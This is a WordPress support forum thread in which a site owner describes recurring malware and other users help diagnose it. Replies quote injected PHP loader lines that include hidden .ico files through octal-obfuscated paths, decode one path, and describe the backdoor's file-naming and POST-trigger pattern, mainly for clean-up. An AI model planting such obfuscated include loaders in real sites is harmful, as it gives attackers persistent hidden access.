Malware in .php and numbered .php files ?

  • Good day, I have this reocuring mess that no one seems to know what it is and all malware / antivirus for wordpress fails to block.

    Situation.
    I had hosting with inmotion and there the “infection” started, finally after they could not resolve it, I presume it was cross site contamination and moved to fastcomet hosting.

    Long story short.

    There is files in several domains I have, after I have extensively cleaned it, that comes back to life, literally deleted 90% of the domains websites and uploaded clean march 2019 copies.
    Only exception was cpanel that was migrated and fastcomet used their ninja and all other virus and malware cleaners to fix anything possible.

    In index.php this garbage appears.

    <?php
    /*01e78*/

    @include “\057ho\155e/\150cm\162eu\065/b\154an\143va\056co\155/w\160-a\144mi\156/i\155ag\145s/\05683\1425c\14270\056ic\157”;

    /*01e78*/

    Then somehow these numbered files, yes even this below in a empty directories
    .066551a6.ico
    .10dac2e5.ico
    4uvayita.php
    bjsconzw.php
    index.php
    pivyomcw.php
    etc…

    Does anyone know what this is and how to fix it, not paying some scam malware companies that all fails 100% failure to fix this. Some detect and remove

    Latest wordpress 5.2.2.3
    wp security, ninja, and 30 others individually or combined all active and non of them can stop this from returning and infecting the root hosting folder and several domains.

    Any advice on how to fix this that actually works short of deleting complete cpanel and even then it might return.

    Thanks for the help.

    • This topic was modified 5 years, 6 months ago by madrocker13.
Viewing 4 replies - 1 through 4 (of 4 total)

  • I’d export my media and content via the tools menu under the dashboard…

    I’d then grab a new server account where ever I felt comfortable with.

    Install a pristine WordPress from their one button or manually if I didn’t like their one button (though I like both Turnkey and Bitnami they are not quite the same as a normal CPanel one button install).

    Bring the new, empty site up and install iThemes Security, WordFence, WordFence assistant, and Sucurii plugins. Enable the WordFence and Ithemes right now then install the Import plugin and Import all your WXR files including the media. If the files are too big for your new host you can use a ‘XML chunker/splitter’ on them.

    Run the ‘upgrade’ page just to make sure all is good. Install your previous theme… from a new copy if you can!

    Swap your DNS around for the new sites location if you haven’t done so already. Login as admin again and make sure WordFence and iThemes Security are configured well and running. Fire up Sucuri and let it run for a while.

    Sucuri will traverse your site and warn you if it finds anything. WordFence will lockout many of the problematic hacker/users. iThemes will settle in and Work well with WordFence. You can disable Sucuri once you have finished configuring and testing the site. That should have exposed any viruses or malware by then. iThemes will do a good job and if you leave the Sucuri plugin disabled but installed you can run it at will when you think something is up.

    Look into https://www.ads-software.com/support/article/hardening-wordpress/ next and passwords need to be very tough.

    Pay some attention to any users you bought in during the Import process and consider a new admin account taking all but the subscriber privileges away from your old admin user who is probably the user #1 also. That right there and your WordFence will foil a lot of the script kiddies.

    Don’t publish your posts using the new admin account either. Use a contributor or editor account instead.

    One final step would be to put your site on Cloudflare also… You’ll get one of the best DNS services in the business and your actual ‘origin’ server will be behind a proxy effectively firewalling that off from the greater internet once CloudFlare takes over.

    And the WordFence Assistant? It’s just going to sit there unless you need it really bad because your admin accounts IP address is blocked. Once you get back in you’ll use the assistant to unblock your admin account and fix things. Then you’ll disable it again. Let it sleep… it will have earned its keep by the first time you need it.

    • This reply was modified 5 years, 6 months ago by JNashHawkins.
    • This reply was modified 5 years, 6 months ago by JNashHawkins.
    Thread Starter madrocker13

    (@madrocker13)

    Thank you.
    Only thing I did not do from your list was CloudFlare.
    Users using a alternative nickname to post.

    Active and properly configured to almost extreme levels including scans local and remote.

    All In One WP Security
    Anti-Malware Security and Brute-Force Firewall
    Quttera Web Malware Scanner
    Sucuri Security – Auditing, Malware Scanner and Hardening
    WP Content Copy Protection & No Right Click>>Ninja and all the other plugins total of 30 plugins.

    Will report back.

    The include line decodes to:
    “/home/hcmreu5/blancva.com/wp-admin/images/.83b5cb70.ico”;
    and it seems like the file is still there.
    The encoding is normal text with some characters replaced by their octal equivalents.You can decode the file here:
    https://malwaredecoder.com/

    I have found similar malware on my own server. You should also look for files with the name index.html.bak.bak which has been replaced by index.php that echoes the .bak file and includes a .ico file.
    <?php
    /*aaa83*/

    @include “\057var\057www\057htm\154/ty\144nin\147er/\145n-s\166aer\055foe\144sel\057.8f\063402\0659.i\143o”;

    /*aaa83*/
    echo @file_get_contents(‘index.html.bak.bak’);

    To find possible index.php candidates search for index.php that is not executable.
    The .php and .ico files all seem to have 8 characters as the base name with .ico having a leading . to make it invisible for normal ls.

    The .ico file contains code that I haven’t been able to decode, but it is kind of URL-encoded string, that will translate to PHP-code.

    If to have access to your Web-server logs you can look for POST and 8 character .php files. The index.php file is used with POST of a variable like ?nwhtu=evgqy.

    I just found that this PHP malware scanner works quite OK.
    https://github.com/scr34m/php-malware-scanner
    I used scan -e .php -k -d /var/www/html and found most of the infected php pages.

    I found that my main index.php for my WordPress installation was infected with PHP code with loads of IP-addresses. I assume these addresses is used the report back that the site is still up and ready to be infected further.

Viewing 4 replies - 1 through 4 (of 4 total)
  • The topic ‘Malware in .php and numbered .php files ?’ is closed to new replies.